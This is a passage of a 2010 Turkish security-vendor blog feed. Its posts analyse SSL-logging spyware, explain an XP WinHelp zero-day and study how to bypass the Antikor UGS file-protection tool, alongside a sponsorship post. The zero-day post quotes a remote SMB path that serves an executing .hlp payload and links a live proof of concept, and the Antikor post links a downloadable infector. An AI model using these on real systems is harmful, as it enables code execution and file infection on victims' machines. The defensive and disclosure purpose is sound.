class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_W_bgBWwE23o/S493VLCM5PI/AAAAAAAAANU/q-t2lxGHlJk/s1600-h/paypal_ssl_logger2.PNG" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="367" kt="true" src="http://2.bp.blogspot.com/_W_bgBWwE23o/S493VLCM5PI/AAAAAAAAANU/q-t2lxGHlJk/s400/paypal_ssl_logger2.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Rutin analizler sırasında, bir spyware'da SSL logger özelliğine rastladım. (Bizim SSL-Logger simülasyonunda kullandığımız metod) spyware'in yaptığı, Facebook'tan tutunda banka hesaplarınıza, yaptığınız alışveriş sitelerindeki şifrelerinize hatta tüm Yahoo Messenger ve MSN messenger şifrelerinize kadar almak. &lt;br /&gt;
&lt;br /&gt;
Bazı yerlerde Youtube yasağını kaldırıcak bir program olarak lansa edilmiş ve gerçektende DNS değiştirerek bu yasagı kaldırıyor, buda programın çalışıtığını ispatlamasını sağlıyor. İşin en ilginç kısmı ise bunun tamamen bir Türk tarafından yapılması, bunu sadece hedef aldığı sistem için söylemiyorum aynı zamanda programda kullanılan değişken isimleri dahil Türkçe. Programda, SSL logger dışında, keylogger vs gibi başka hiç bir component yok, tamamen SSL trafiğine focus olmuş durumda, bu da tehlikenin ne derece yüksek olduğunu gösteriyor. &lt;br /&gt;
&lt;br /&gt;
SSL logger işleminin bilinmemesinden dolayı şimdiye kadar bu metodu sadece 6-7 tane banker worm'da görmüştük ancak bundan sonra home made trojanlarda dahil görmeye başlayacağız demekki. &lt;br /&gt;
&lt;br /&gt;
Diğer Antivirüs firmalarımdaki arkadaşlarımdan, Türkiyeden bu spyware'a ait nekadar infeksyon saptadıklarını sordum ve sonuç korkutucu. Her gün ~1500 yeni infeksyon.&lt;br /&gt;
&lt;br /&gt;
Bu programın yuklenmesinden, bilgileri çalana kadar tüm hamleleri AntiLogger tarafından durduruluyor hatta alarmları, yanlışlıkla onaylananlara da bir şey olmuyor çünkü &lt;a href="http://www.zemana.com/SSLLogger.aspx"&gt;Anti-SSL&lt;/a&gt; özelliği için, AntiLogger, kullanıcıya sormadan direk bloke ediyor çünkü hiç bir legal program tarafından bu özellik kullanılmıyor. Tek dikkat etmeniz AntiLogger özellikler kısmında &lt;a href="http://www.zemana.com/SSLLogger.aspx"&gt;Anti-SSL&lt;/a&gt; teknolijisi aktif olmalı. &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_W_bgBWwE23o/S498Poe9c_I/AAAAAAAAANk/LAxqjP1650I/s1600-h/Zemana-SSL-protection.png" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="223" kt="true" src="http://1.bp.blogspot.com/_W_bgBWwE23o/S498Poe9c_I/AAAAAAAAANk/LAxqjP1650I/s320/Zemana-SSL-protection.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Hatta eğer bir Intel netbook sahibi iseniz Intel &lt;a href="http://www.intelappup.com/"&gt;AppUp&lt;/a&gt; store'dan ücretsiz olarak yayınladığımız "&lt;a href="http://www.zemana.com/safebanking.aspx?language=EN"&gt;Secure Banking&lt;/a&gt;" uygulamasını kurarak bu ve benzer tehditlere karşı proactive olarak korunabilirsiniz. "Secure Banking" programını toplu olarak işletmelerede kurabilirsiniz çünkü hiçbir kullanıcı onayı istemeden ve pop-up göstermeden sessizce işini yapıyor.&lt;br /&gt;
&lt;br /&gt;
Programcısı release versionda &lt;a href="http://msdn.microsoft.com/en-us/library/aa363362(VS.85).aspx"&gt;OutputDebugStringA&lt;/a&gt; fonksyonunu kaldırmayı unutmuş ve Dbgview ile çaldığı trafiği üstteki resimdeki gibi görebiliyoruz. &lt;br /&gt;
&lt;br /&gt;
Spyware herhangi bir rootkit modülu taşımadığı için, task manager'dan görüntülenebiliyor ve eğer TranslatorSrv.exe isminde bir process çalışıyorsa makinanıza bulaşmış anlamına geliyor. Tabi bu isim bir diğer varyonlarından farklı olabilir. &lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Not:&lt;/strong&gt; Program, bağlanığı master server'lardan kendini ve programcısını afişe ediyor. Bu bilgiler gerekli birimlerde istendiği taktirde verebiliriz. (emergency [at] zemana.com)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-3680857312500407903?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/H5YJiTUyLgU/turkiyede-httpsssl-hrszlg-part1.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_W_bgBWwE23o/S493VLCM5PI/AAAAAAAAANU/q-t2lxGHlJk/s72-c/paypal_ssl_logger2.PNG" height="72" width="72" /><thr:total>6</thr:total><feedburner:origLink>http://blog.zemana.com/2010/03/turkiyede-httpsssl-hrszlg-part1.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-368072190028645279</guid><pubDate>Tue, 02 Mar 2010 18:18:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.177+03:00</atom:updated><title>F1 Tuşuna basmayın!!!</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_W_bgBWwE23o/S41UpsDJnbI/AAAAAAAAAM0/ZSww4PGVnBs/s1600-h/msgbox_hlp_exploit.png" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="338" kt="true" src="http://3.bp.blogspot.com/_W_bgBWwE23o/S41UpsDJnbI/AAAAAAAAAM0/ZSww4PGVnBs/s400/msgbox_hlp_exploit.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://isec.pl/"&gt;iSEC Security Research&lt;/a&gt; tarafından, XP sistemleri etkileyen 0 günü açığı ve exploiti yayınlandı.&lt;br /&gt;
&lt;br /&gt;
Aslında rapora bakılırsa iSEC bunu 2007'de Microsoft'a rapor etmiş, tahmin ediyoruz uyumluluk sorunları yüzünden yama kapatılamamış ve yakin zamanda kapatılacak gibi &lt;a href="http://www.microsoft.com/technet/security/advisory/981169.mspx"&gt;durmuyor&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Çünkü exploit edilebilmesi için ilgili sayfada F1 tuşuna basmanız gerekiyor, buda exploit edilmesini zorlaştırıyor. Tabi iyi düşünülmüş sosyal mesajlar ile bu tuşa basılması tetiklenebilir (Orn: Videoyu izlemek için F1 tuşuna basınız!).&lt;br /&gt;
&lt;br /&gt;
Açığı tetikleyen JavaScript kütüphanesindeki MsgBox fonksyonu, bu fonksyonun syntax'ına bakalım:&lt;br /&gt;
&lt;strong&gt;MsgBox (Message, Style, Title, HelpFile)&lt;/strong&gt;&lt;br /&gt;
Fonksyon çalışıtığında F1 (HELP)&amp;nbsp;tuşuna başılınca, HelpFile da belirtilen&amp;nbsp;dosya, ilk önce local file sistemde, yoksa yerel ağda aranıyor ve çalıştırılıyor.&lt;br /&gt;
&lt;br /&gt;
Bunu internet üzerinde exploit edebilmek için , yazar, Samba serverda public share açmış ve yolu şu şekilde yazmıs:&lt;br /&gt;
&lt;strong&gt;"\\184.73.14.110\PUBLIC\test.hlp"&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
test.hlp dosyası da görüntülendiğinde hesap makinasını çalıştırıyor. Tabi hesap makinası yerine zararlı bir exe de olabilirdi. (Hatırlatma: .hlp dosyaları çalıştırılabilir&amp;nbsp;risk sınıfı uzantılara giriyor)&lt;br /&gt;
&lt;br /&gt;
Tüm yamaları yapılmış XP SP3 ve IE8 ile exploitin çalıştığını teyid ettik. (&lt;a href="http://isec.pl/poc-isec27/box.html"&gt;Test etmek için tıklayın&lt;/a&gt;)&lt;br /&gt;
Peki Vista ve Windows7 neden etkilenmedi onlardada IE8 var?&lt;br /&gt;
Çünkü Microsoft , Vista ve ilerki sürümlerde, risk taşıdığı için .hlp formatını ve winhlp32.exe componentini devre dışı bıraktı.&lt;br /&gt;
&lt;strong&gt;Bu ataktan korunmak için, bu yazıyı okumuş olmanız yeterli sanırsam (Yama gelene kadar Webde gezinirken F1 tuşuna basmayın!!! )&lt;/strong&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-368072190028645279?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/hL-Lz_9EHMk/javascript-msgbox-hlp-0-day.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_W_bgBWwE23o/S41UpsDJnbI/AAAAAAAAAM0/ZSww4PGVnBs/s72-c/msgbox_hlp_exploit.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://blog.zemana.com/2010/03/javascript-msgbox-hlp-0-day.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-3240685801185075083</guid><pubDate>Tue, 02 Mar 2010 11:00:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.183+03:00</atom:updated><title>Zemana V8 Supercars on Clipsal 500</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.zemana.com.au/" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" kt="true" src="http://3.bp.blogspot.com/_W_bgBWwE23o/S40h9pyxDOI/AAAAAAAAAMs/p6GicWPIxqg/s320/zemana_australia.png" /&gt;&lt;/a&gt;&lt;/div&gt;Her sene Avustralya da düzenlenen ve dünyaca ilgi gören &lt;a href="http://www.clipsal500.com.au/"&gt;Clipsal 500&lt;/a&gt; yarışmasında, 2 tane V8 Supercar Ford marka araba, &lt;a href="http://www.zemana.com.au/"&gt;Zemana Australia&lt;/a&gt; logoları ile dizayn edilecek. Assağıdaki resimde maket resimlerini görebilirsiniz. Yarışlar 10-14 mart arası olacak, Avustralya da bulunan okurlarımız varsa bize email atın , ilk 3 email atana Gold Zone tirubununden&amp;nbsp;bilet hediye. Arabalar şu anda giydiriliyor ve piste çıktıklarında gerçek resimlerini sizlerle paylaşacağız. &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_W_bgBWwE23o/S4zvPF2mWSI/AAAAAAAAAMk/0LinisNOF4U/s1600-h/Zemana_V8_racing_Supercar.jpg" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="308" kt="true" src="http://1.bp.blogspot.com/_W_bgBWwE23o/S4zvPF2mWSI/AAAAAAAAAMk/0LinisNOF4U/s400/Zemana_V8_racing_Supercar.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;object height="340" width="560"&gt;&lt;param name="movie" value="http://www.clipsal500.com.au/flash/video_player.swf?movie=%2Fflash%2Ftv_low.flv"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.clipsal500.com.au/flash/video_player.swf?movie=%2Fflash%2Ftv_low.flv" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="560" height="340"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_W_bgBWwE23o/S45VwJv2SpI/AAAAAAAAANM/C2Xp2ch-VPo/s1600-h/ZemanaRacingBanner.jpg" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="72" kt="true" src="http://3.bp.blogspot.com/_W_bgBWwE23o/S45VwJv2SpI/AAAAAAAAANM/C2Xp2ch-VPo/s640/ZemanaRacingBanner.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1109329877337930296-3240685801185075083?l=blog.zemana.com' alt='' /&gt;&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/blog_zemana/~3/T4N2Z8pPGGI/zemana-v8-supercars-on-clipsal-500.html</link><author>erkan.arnaudov@zemana.com (Erkan Arnaudov)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_W_bgBWwE23o/S40h9pyxDOI/AAAAAAAAAMs/p6GicWPIxqg/s72-c/zemana_australia.png" height="72" width="72" /><thr:total>6</thr:total><feedburner:origLink>http://blog.zemana.com/2010/03/zemana-v8-supercars-on-clipsal-500.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1109329877337930296.post-9083942178298119388</guid><pubDate>Mon, 01 Mar 2010 16:26:00 +0000</pubDate><atom:updated>2010-05-26T17:27:44.188+03:00</atom:updated><title>Antikor UGS Research (Part1)</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_W_bgBWwE23o/S4vrmk_M1rI/AAAAAAAAALs/FWCtKIhRsTM/s1600-h/Antikor_alert.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" kt="true" src="http://4.bp.blogspot.com/_W_bgBWwE23o/S4vrmk_M1rI/AAAAAAAAALs/FWCtKIhRsTM/s320/Antikor_alert.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Türk menşeili ve kendi alanında bir ilk olan &lt;a href="http://www.antikorugs.com/"&gt;Antikor UGS&lt;/a&gt;'yi mercek altına aldım. &lt;br /&gt;
Program hakkında tubitakta bulunan dokumanı &lt;a href="http://www.bilgiguvenligi.gov.tr/zararli-yazilimlar/uygulama-guvenliginde-nesne-esasli-koruma.html"&gt;buradan&lt;/a&gt; okuyabilirsiniz &lt;br /&gt;
Programın yazılış amacı, PE dosyalarına infect olan virüslerden korunmak. (Örnek &lt;a href="http://www.bitdefender.com/VIRUS-1000025-en--Win32.Parite.A-B-C.html"&gt;Win32/Parite&lt;/a&gt;)&lt;br /&gt;
&lt;br /&gt;
Bunu yapabilmek için program ilk çalıştığında sistemdeki uygulamaları tarıyor ve uygun gördüğü PE dosyalarının içine özel bir kod yerleştiriyor &lt;br /&gt;
&lt;br /&gt;
Bu kod çalıştığında dosyanın infekte olup olmadığına bakıyor ve infekte ise kendi kendini temizliyor. &lt;br /&gt;
&lt;br /&gt;
Programda kullanılan mantık güzel ancak bence bu program sadece bir ar-ge projesi olabilir çünkü bu program koruma amaçlıda olsa, uygulamalarınızı ve sistem dosyalarının yapısını ve varsa üzerlerindeki dijital imzayı bozacak. Ardından sistem çökmeleri vs gelecek. Ve ayrıca artık Win32/Parite gibi sistem dosyalarına bulaşan PE infector virüsleri kalmadı denebilir. &lt;br /&gt;
&lt;br /&gt;
PE infector yazacak kadar ileri virüs yazarları , sanal korsanlar için çalışır oldu ve sanal korsanlarda bu kişilere spyware/spam-bots gibi yazılımlar yazdırıyorlar ve yayılma biçimi olarak ta P2P,email,MS açıkları,sosyal ağlar gibi yöntemler kullanıyorlar.&lt;br /&gt;
&lt;br /&gt;
Eskiden virüs yazarları arasında, PE dosyalarını infect etmek, hele hele polymorphic olarak infect etmek bir yarış halini almıştı ancak şu anda &lt;a href="http://msdn.microsoft.com/en-us/magazine/cc301805.aspx"&gt;PE protokolu&lt;/a&gt; ile ilgili full dokümantasyon ve örnek kodlar okadar fazlalaştı ki artık bunu yapmak çok kolay oldu. &lt;br /&gt;
&lt;br /&gt;
Geçtiğimiz senin trendleri rootkitler oldu roustock,TLS gibi dosya sistemi üzerindeki en alt seviyedeki DISK I/O driver infeksyonları ile nerdeyse görünmez oldular. (driver dosyalarida PE tipidir ve uzantıları .sys 'dir)&lt;br /&gt;
&lt;br /&gt;
Bu virüsler bütün Antivirüs firmalarının korkulu rüyası oldu hatta Kaspersky, bu gibi infeksyonların önüne geçmek için donanım tabanlı antivirüs patenti bile aldı :) &lt;br /&gt;
&lt;br /&gt;
Sonuç olarak bu program hernekadar, teknolojisi ile &lt;a href="http://www.flasgazetesi.com.tr/haberDetayMiddle.asp?ID=10669"&gt;ses getirmiş&lt;/a&gt; olsada günümüzün tehditlerine karşı bir çözüm getiremez diye düşünüyorum ve burada bir marketing segment olduğunu sanmıyorum. (Tabi bu tamamen benim fikrim)&lt;br /&gt;
&lt;br /&gt;
Aslında Türkiyede çok fazla yetenek var ancak herkes tekbaşına birşeyler yapmaya çalışıyor ve Yurtdışı ile yarışabilecek yada Türkiye'ye döviz getirebilecek bir ürün çıkmıyor. Bu kişiler hep beraber aynı çatıda iyi bir organisayon ile birşey yaparsa ses getirir diye düşünüyorum. Böyle bir organisazyonuda &lt;a href="http://doctus.org/"&gt;doctus.org&lt;/a&gt;'un yapabileceği kanaatındayım. ( Üyeleri okuyorsa, yönetime baskı yapın :) ) &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Antikor UGS çalışma mantığı:&lt;/b&gt;&lt;br /&gt;
Hedef dosyada &lt;b&gt;antjn01&lt;/b&gt; adlı bir seçtion oluşturuluyor ve buraya orjinal dosyaya ait alttaki kısımların bir kopyası konuluyor. &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;PIMAGE_DOS_HEADER&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;PIMAGE_NT_HEADERS&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;IAT&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;OEP&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
ve ardından ilgili section, bir dizi XOR,ROR ve ROL işlemi ile tek taraflı encrypt ediliyor.&lt;br /&gt;
&lt;br /&gt;
Arkasından OEP aynı offsette kalacak şekilde değiştiriliyor, bu yeni OEP çalıştığında, antikor seçtion'nını decrypt ediyor ve kontrolü oraya bırakıyor , antjn01 içindeki Antikor kodu çalıştığında ise dosyanın infect olup olmadığına bakıyor ve infect olmuşsa, antjn01 seçtionnına daha önceden konulmuş olan orjinal değerler ile dosyayı onarıyor. &lt;br /&gt;
&lt;br /&gt;
Takım şefimizin ve ARF teknolojinin benden istediği Antikor ile korunan bir dosyayi infecte etmek. Yani virüs yazarını simüle etmek.&lt;br /&gt;
&lt;br /&gt;
Ring0'da dahil olmak üzere çeşitli deobfuscator/packer teknikleri için static unpacker yazan bir kişi olduğum için bu benim için çok kolay oldu. PE infector virüsü yazan kişiler içinde Antikor'u bu sürümünde bypass etmek çok zor olmaz.&lt;br /&gt;
&lt;br /&gt;
Antikor ile patch edilmiş bir dosyayı ollydbg'a yüklediğimde alttaki şekilde bir OEP ile karşılaştim. Encrypt loop'u kırmızı içine aldım.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_W_bgBWwE23o/S4vvXhhiAeI/AAAAAAAAAMM/Rm4NySP7GpY/s1600-h/antikor_oep.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" kt="true" src="http://2.bp.blogspot.com/_W_bgBWwE23o/S4vvXhhiAeI/AAAAAAAAAMM/Rm4NySP7GpY/s320/antikor_oep.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Program bir uygulamaya uygulandığında herseferinde random bir xor key üretiyor. Bu nedenle antjn01 secion, her uygulamada farklı oluyor, bu yüzden ilk önce kullanılan xor key'i bulmak arkasından alttaki fonksyon ile section'i decrypt etmek gerekiyor. &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_W_bgBWwE23o/S4vw28O4OrI/AAAAAAAAAMc/FQ0mxP529ks/s1600-h/Antikor_decrypt.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" kt="true" src="http://1.bp.blogspot.com/_W_bgBWwE23o/S4vw28O4OrI/AAAAAAAAAMc/FQ0mxP529ks/s320/Antikor_decrypt.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Decrypt ettikten sonra orjinal OEP'i, antjn01 içinden alıp eski yerine yazıyoruz. Arkasından antjn01 seçtionu silip PE header'i fix ediyoruz ve kaydediyoruz. Artık dosya eski haline dondu.&lt;br /&gt;
&lt;br /&gt;
Bu anlattığım yöntemler ile, Antikorla korunan dosyaları orjinal haline getirebilecek hatta infecte edebilecek bir uygulama yazdım &lt;a href="http://zemana.com/download/research/Antikor/Unpacker.rar"&gt;buradan&lt;/a&gt; indirebilirsiniz.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_W_bgBWwE23o/S4vr8Kp77sI/AAAAAAAAAL0/tr0pYQHOkFE/s1600-h/antikor-unpack.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" kt="true" src="http://1.bp.blogspot.com/_W_bgBWwE23o/S4vr8Kp77sI/AAAAAAAAAL0/tr0pYQHOkFE/s320/antikor-unpack.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Test etmek içinde &lt;a href="http://zemana.com/download/research/Antikor/WinSpy_antikor.rar"&gt;burdan&lt;/a&gt; ,&amp;nbsp;&lt;a href="http://www.codeproject.com/KB/threads/winspy.aspx"&gt;Robert Kuster&lt;/a&gt;&amp;nbsp;yazdigi WinSpy&amp;nbsp;programının antikor işlemine tutulmuş halini indirebilirsiniz. &lt;br /&gt;
&lt;br /&gt;
Infecte dediğim, uygulamaya basit bir messagebox ekliyor amaç infect olabildiğini göstermek yoksa gerçek infeksyon rütünleri yok tabi!!!&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;NOT:&lt;/b&gt; Testlerimi, programın kendi sayfasındaki son indirilebilir sürüm üzerinde yaptım (1.0.0.2). Eski sürümlerinde yada daha sonra çıkacak sürümleri üzerinde çalışmayabilir. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Antikor uygulamasını bypass edene &lt;a href="http://www.antikorugs.com/p/news.php?readmore=8"&gt;500TL&lt;/a&gt; ödül veriliyor, bende bunu almıs oluyorum :) &lt;br /&gt;
Ve bu parayı, benim yazdığım infector ile, infect edilen dosyayı temizleyebilecek bir araç yapana veriyorum.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_W_bgBWwE23o/S4vsmreYEeI/AAAAAAAAAME/D61975NHrF4/s1600-h/antikor.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="72" kt="true" src="http://4.bp.blogspot.com/_W_bgBWwE23o/S4vsmreYEeI/AAAAAAAAAME/D61975NHrF4/s400/antikor.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Elinizi çabuk tutun, nitekim ARF teknoloji sizden önce cleaner yaparsa para bana gelmeden orada kalır :) &lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Kural:&lt;/b&gt; Cleaner, static olmalı, yani dosyayı çalıştırmadan temizleme yapmalı, eğer dynamic olarak yaparsanız&amp;nbsp; ödülün yarısı 250TL. OllyScript vb ile yaparsanız, &lt;a href="http://www.intel.com/intelpress/"&gt;Intel Press&lt;/a&gt;'ten istediğiniz bir kitap hediye!&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Not:&lt;/b&gt; Dosyanın içinde MessageBoxA çağrısını patch etmeyi çözüm olarak kabul etmem, program tam eski haline gelmese bile en azından IAT ve OEP düzeltilmelidir çünkü burdaki mesaj box sembolik, amaç infectionu temizlemek.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;UPDATE (1:16 PM 4/6/2010):&lt;/b&gt; Unpacker yarışması için uğraşan varsa artık sadece dynamic yada OllyScript çözümü ile uğraşması gerekmekte çünkü static unpacker çözümü bulundu. (Bloğumuzun iyi bir takipçisi ve aynı zamanada yarışmalarımızda her zaman doğru çözümler üreten &lt;a href="http://7f6343.blogspot.com/"&gt;civil engineer&lt;/a&gt;, bu defada çözümü buldu ve en büyük ödülün sahibi oldu çünkü çözüm yolu static, tekrar tebrikler civil engineer!&amp;nbsp;)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;UPDATE (8:07 PM 4/6/2010):&lt;/b&gt; Dynamic ve OllyScript çözümleride  geldi. Yarışmada 750TL + Kitap hediye vermiş bulunuyoruz. Yarışmaya  katılan herkeze teşekkür ederiz. (Yarışmanın 2. ve 3.  aşamalarını FunyBoy tamamladı, tebrikler! )&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_W_bgBWwE23o/S7sNWS3v59I/AAAAAAAAAO0/_ITvzNlLpXU/s1600/sshot-1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="291" nt="true" src="http://2.bp.blogspot.com/_W_bgBWwE23o/S7sNWS3v59I/AAAAAAAAAO0/_ITvzNlLpXU/s400/sshot-1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_W_bgBWwE23o/S7t1DFJopWI/AAAAAAAAAPc/LCiTOq9EnrQ/s1600/dynamic.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="191" src="http://2.bp.blogspot.com/_W_bgBWwE23o/S7t1DFJopWI/AAAAAAAAAPc/LCiTOq9EnrQ/s400/dynamic.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
